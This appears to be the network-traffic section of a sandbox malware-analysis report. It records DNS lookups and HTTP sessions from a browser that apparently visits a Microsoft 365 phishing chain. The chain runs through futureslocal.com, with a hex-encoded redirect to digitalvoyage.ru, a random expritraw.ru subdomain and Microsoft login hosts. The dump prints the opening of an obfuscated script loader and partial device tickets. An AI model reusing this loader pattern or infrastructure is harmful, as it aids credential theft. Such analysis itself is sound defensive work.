                                                                                  Jan 7, 2025 19:50:04.876759052 CET192.168.2.61.1.1.10xa0b2Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:50:04.876905918 CET192.168.2.61.1.1.10xd116Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 7, 2025 19:48:58.220829010 CET1.1.1.1192.168.2.60x429eNo error (0)futureslocal.com103.83.194.55A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.194576979 CET1.1.1.1192.168.2.60x634fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.194576979 CET1.1.1.1192.168.2.60x634fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.195117950 CET1.1.1.1192.168.2.60x9650No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.266968966 CET1.1.1.1192.168.2.60x29cfNo error (0)futureslocal.com103.83.194.55A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.992007017 CET1.1.1.1192.168.2.60xc54dNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.992007017 CET1.1.1.1192.168.2.60xc54dNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:48:59.993099928 CET1.1.1.1192.168.2.60x9e32No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.287393093 CET1.1.1.1192.168.2.60x8a6aNo error (0)7x8x.digitalvoyage.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:00.296613932 CET1.1.1.1192.168.2.60x76c7No error (0)7x8x.digitalvoyage.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766294003 CET1.1.1.1192.168.2.60x1cd5No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766294003 CET1.1.1.1192.168.2.60x1cd5No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766294003 CET1.1.1.1192.168.2.60x1cd5No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766294003 CET1.1.1.1192.168.2.60x1cd5No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766935110 CET1.1.1.1192.168.2.60x53d3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766935110 CET1.1.1.1192.168.2.60x53d3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.766946077 CET1.1.1.1192.168.2.60x881bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.767334938 CET1.1.1.1192.168.2.60xeaf1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.767344952 CET1.1.1.1192.168.2.60xb9fcNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:01.767344952 CET1.1.1.1192.168.2.60xb9fcNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.133348942 CET1.1.1.1192.168.2.60xb743No error (0)www.google.com142.250.186.36A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.133924961 CET1.1.1.1192.168.2.60x3b44No error (0)www.google.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.549072981 CET1.1.1.1192.168.2.60xc0e6No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.549072981 CET1.1.1.1192.168.2.60xc0e6No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.549072981 CET1.1.1.1192.168.2.60xc0e6No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:02.549072981 CET1.1.1.1192.168.2.60xc0e6No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.145767927 CET1.1.1.1192.168.2.60x819No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.146123886 CET1.1.1.1192.168.2.60x1e69No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.146123886 CET1.1.1.1192.168.2.60x1e69No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.180180073 CET1.1.1.1192.168.2.60xd058No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.180180073 CET1.1.1.1192.168.2.60xd058No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:03.180804014 CET1.1.1.1192.168.2.60x11c9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:04.869146109 CET1.1.1.1192.168.2.60xc921No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:19.351447105 CET1.1.1.1192.168.2.60x18c0No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:19.351447105 CET1.1.1.1192.168.2.60x18c0No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:19.351813078 CET1.1.1.1192.168.2.60xb7f8No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.921581030 CET1.1.1.1192.168.2.60x7092No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.921592951 CET1.1.1.1192.168.2.60xb5f2No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:20.997411013 CET1.1.1.1192.168.2.60xb174No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru65IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:21.070576906 CET1.1.1.1192.168.2.60x6287No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:21.070576906 CET1.1.1.1192.168.2.60x6287No error (0)nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.018759012 CET1.1.1.1192.168.2.60xd8bdNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.018759012 CET1.1.1.1192.168.2.60xd8bdNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.048763990 CET1.1.1.1192.168.2.60xe9ccNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:22.048763990 CET1.1.1.1192.168.2.60xe9ccNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:23.510128975 CET1.1.1.1192.168.2.60x1a4No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:23.510128975 CET1.1.1.1192.168.2.60x1a4No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.484939098 CET1.1.1.1192.168.2.60xd72aNo error (0)shed.dual-low.s-part-0039.t-0009.t-msedge.nets-part-0039.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.484939098 CET1.1.1.1192.168.2.60xd72aNo error (0)s-part-0039.t-0009.t-msedge.net13.107.246.67A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.492011070 CET1.1.1.1192.168.2.60xe97dNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.492011070 CET1.1.1.1192.168.2.60xe97dNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.492274046 CET1.1.1.1192.168.2.60xf2cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:24.492274046 CET1.1.1.1192.168.2.60xf2cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.619103909 CET1.1.1.1192.168.2.60x5216No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.619103909 CET1.1.1.1192.168.2.60x5216No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.619103909 CET1.1.1.1192.168.2.60x5216No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.620245934 CET1.1.1.1192.168.2.60xd414No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:25.620245934 CET1.1.1.1192.168.2.60xd414No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:40.721602917 CET1.1.1.1192.168.2.60xd680No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:49:40.722173929 CET1.1.1.1192.168.2.60x179eNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:50:04.884067059 CET1.1.1.1192.168.2.60xa0b2No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Jan 7, 2025 19:50:04.884625912 CET1.1.1.1192.168.2.60xd116No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                  • futureslocal.com
                                                                                  • cdnjs.cloudflare.com
                                                                                  • 7x8x.digitalvoyage.ru
                                                                                  • https:
                                                                                    • challenges.cloudflare.com
                                                                                    • code.jquery.com
                                                                                    • nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru
                                                                                  • a.nel.cloudflare.com
                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  0192.168.2.64970840.113.103.199443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:48:57 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6a 6a 56 39 41 4e 79 66 47 30 36 61 6a 39 74 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 61 33 64 33 38 64 61 38 34 64 66 38 31 35 35 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: jjV9ANyfG06aj9tM.1Context: aa3d38da84df8155
                                                                                  2025-01-07 18:48:57 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:48:57 UTC1076OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 35 33 0d 0a 4d 53 2d 43 56 3a 20 6a 6a 56 39 41 4e 79 66 47 30 36 61 6a 39 74 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 61 33 64 33 38 64 61 38 34 64 66 38 31 35 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 77 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 7a 55 45 6b 33 4e 66 59 68 39 44 37 4a 45 5a 56 62 6c 51 70 7a 62 55 68 49 35 31 6e 4c 71 31 6c 79 78 73 49 65 70 6c 50 58 6f 72 4f 79 52 49 56 48 6e 75 53 2b 51 69 6e 32 63 6a 51 38 47 78 6c 52 66 65 2f 66 72 53 38 6e 4e 35 33 45 6b 50 56 49 67 5a 54 76 4c 63 7a 43 74 4b 2f 74 4b 78 6b 4e 6c 45 66 39 33 48 61 4b 43 39 4b
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1053MS-CV: jjV9ANyfG06aj9tM.2Context: aa3d38da84df8155<device><compact-ticket>t=EwCwAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXzUEk3NfYh9D7JEZVblQpzbUhI51nLq1lyxsIeplPXorOyRIVHnuS+Qin2cjQ8GxlRfe/frS8nN53EkPVIgZTvLczCtK/tKxkNlEf93HaKC9K
                                                                                  2025-01-07 18:48:57 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6a 6a 56 39 41 4e 79 66 47 30 36 61 6a 39 74 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 61 33 64 33 38 64 61 38 34 64 66 38 31 35 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: jjV9ANyfG06aj9tM.3Context: aa3d38da84df8155<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:48:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
                                                                                  2025-01-07 18:48:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 75 47 5a 54 4f 38 2b 7a 63 30 75 34 33 33 66 4b 53 43 69 4d 6d 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: uGZTO8+zc0u433fKSCiMmg.0Payload parsing failed.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649713103.83.194.554436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:48:58 UTC660OUTGET /res444.php?2-68747470733a2f2f375838782e6469676974616c766f796167652e72752f786178622f-scorpion HTTP/1.1
                                                                                  Host: futureslocal.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:48:59 UTC196INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:48:59 GMT
                                                                                  Server: Apache
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/javascript;charset=UTF-8
                                                                                  2025-01-07 18:48:59 UTC2002INData Raw: 37 63 36 0d 0a 20 20 20 20 76 61 72 20 67 57 66 44 6a 75 65 55 6e 55 68 79 6c 68 4f 4b 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 67 57 66 44 6a 75 65 55 6e 55 68 79 6c 68 4f 4b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 67 57 66 44 6a 75 65 55 6e 55 68 79 6c 68 4f 4b 29 3b 0d 0a 67 57 66 44 6a 75 65 55 6e 55 68 79 6c 68 4f 4b 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29
                                                                                  Data Ascii: 7c6 var gWfDjueUnUhylhOK = document.createElement("script");gWfDjueUnUhylhOK.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(gWfDjueUnUhylhOK);gWfDjueUnUhylhOK.onload=function()


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  2192.168.2.64971240.113.103.199443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:48:59 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 46 4d 53 41 5a 43 77 46 56 45 36 6e 67 66 4f 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 62 31 66 37 31 66 38 35 36 61 62 33 33 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: FMSAZCwFVE6ngfO6.1Context: e96b1f71f856ab33
                                                                                  2025-01-07 18:48:59 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:48:59 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 46 4d 53 41 5a 43 77 46 56 45 36 6e 67 66 4f 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 62 31 66 37 31 66 38 35 36 61 62 33 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: FMSAZCwFVE6ngfO6.2Context: e96b1f71f856ab33<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
                                                                                  2025-01-07 18:48:59 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 46 4d 53 41 5a 43 77 46 56 45 36 6e 67 66 4f 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 39 36 62 31 66 37 31 66 38 35 36 61 62 33 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: FMSAZCwFVE6ngfO6.3Context: e96b1f71f856ab33<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:48:59 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
                                                                                  2025-01-07 18:48:59 UTC58INData Raw: 4d 53 2d 43 56 3a 20 65 6c 76 67 44 2b 79 41 2b 30 4b 34 6b 6c 48 69 41 48 66 52 6b 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: elvgD+yA+0K4klHiAHfRkQ.0Payload parsing failed.


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649718104.17.24.144436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:48:59 UTC526OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                  Host: cdnjs.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: script
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:48:59 UTC959INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:48:59 GMT
                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Cache-Control: public, max-age=30672000
                                                                                  ETag: W/"5eb03e2d-bb78"
                                                                                  Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                  cf-cdnjs-via: cfworker/kv
                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                  Timing-Allow-Origin: *
                                                                                  X-Content-Type-Options: nosniff
                                                                                  CF-Cache-Status: HIT
                                                                                  Age: 79413
                                                                                  Expires: Sun, 28 Dec 2025 18:48:59 GMT
